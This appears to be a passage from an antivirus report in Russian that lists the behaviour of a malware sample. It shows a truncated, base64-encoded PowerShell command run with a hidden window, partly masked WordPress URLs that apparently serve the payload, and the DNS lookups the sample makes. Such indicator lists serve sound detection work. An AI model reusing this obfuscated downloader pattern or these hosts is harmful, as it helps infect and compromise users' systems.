Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABXADgAdAB2AHcAegBoAD0AKAAoACcAQQBzACcAKwAnADIAbgAnACkAKwAnAF8AJwArACcAZgB6ACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAUgBQAHIATw...
- http://www.cy###deli.com/wp-admin/m/
- http://sk###club.com/wp-content/bUdvlTm9D/
- http://in###sitek.com/wp-content/jkCz/
- http://www.yu###ulan.com/wp-includes/XPXi0L/
- http://cr####veignite.com/wp-content/fnEhE/
- DNS ASK cy###deli.com
- DNS ASK ra######stianalasvegas.com
- DNS ASK sk###club.com
- DNS ASK in###sitek.com
- DNS ASK vl####rcio.com.br
- DNS ASK yu###ulan.com
- DNS ASK cr####veignite.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABXADgAdAB2AHcAegBoAD0AKAAoACcAQQBzACcAKwAnADIAbgAnACkAKwAnAF8AJwArACcAZgB6ACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAUgBQAHIATw...' (со скрытым окном)